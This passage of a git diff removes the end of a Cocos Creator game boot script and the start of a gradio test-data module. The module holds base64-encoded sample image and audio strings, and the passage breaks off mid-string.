- }); - jsList.push(bundledScript); - } - else { - jsList = [bundledScript]; - } - } - - // anysdk scripts - if (cc.sys.isNative && cc.sys.isMobile) { - jsList = jsList.concat(['src/anysdk/jsb_anysdk.js', 'src/anysdk/jsb_anysdk_constants.js']); - } - - var option = { - //width: width, - //height: height, - id: 'GameCanvas', - scenes: settings.scenes, - debugMode: settings.debug ? cc.DebugMode.INFO : cc.DebugMode.ERROR, - showFPS: (!false && !false) && settings.debug, - frameRate: 60, - jsList: jsList, - groupList: settings.groupList, - collisionMatrix: settings.collisionMatrix, - renderMode: 1 - } - - cc.game.run(option, onStart); - } - - if (false) { - BK.Script.loadlib('GameRes://libs/qqplay-adapter.js'); - BK.Script.loadlib('GameRes://src/settings.js'); - BK.Script.loadlib(); - BK.Script.loadlib('GameRes://libs/qqplay-downloader.js'); - qqPlayDownloader.REMOTE_SERVER_ROOT = ""; - var prevPipe = cc.loader.md5Pipe || cc.loader.assetLoader; - cc.loader.insertPipeAfter(prevPipe, qqPlayDownloader); - // - boot(); - return; - } - - if (false) { - require(window._CCSettings.debug ? 'cocos2d-js.js' : 'cocos2d-js-min.335ee.js'); - require('./libs/weapp-adapter/engine/index.js'); - var prevPipe = cc.loader.md5Pipe || cc.loader.assetLoader; - cc.loader.insertPipeAfter(prevPipe, wxDownloader); - boot(); - return; - } - - if (window.jsb) { - require('src/settings.b2ff5.js'); - require('src/jsb_polyfill.js'); - boot(); - return; - } - - if (window.document) { - var splash = document.getElementById('splash'); - splash.style.display = 'block'; - - var cocos2d = document.createElement('script'); - cocos2d.async = true; - cocos2d.src = window._CCSettings.debug ? 'cocos2d-js.js' : 'cocos2d-js-min.335ee.js'; - - var engineLoaded = function () { - document.body.removeChild(cocos2d); - cocos2d.removeEventListener('load', engineLoaded, false); - if (typeof VConsole !== 'undefined') { - window.vConsole = new VConsole(); - } - boot(); - }; - cocos2d.addEventListener('load', engineLoaded, false); - document.body.appendChild(cocos2d); - } - -})(); diff --git a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py b/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py deleted file mode 100644 index ecbb7442a6c7c1a13f24418bea01e74aeee4d033..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/media_data.py +++ /dev/null @@ -1,8655 +0,0 @@ -BASE64_IMAGE = ( # test/test_files/bus.png - "data:image/png;base64," - "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" -) -BASE64_AUDIO = { - "name": "test/test_files/audio_sample.wav", - "data": "data:audio/wav;base64,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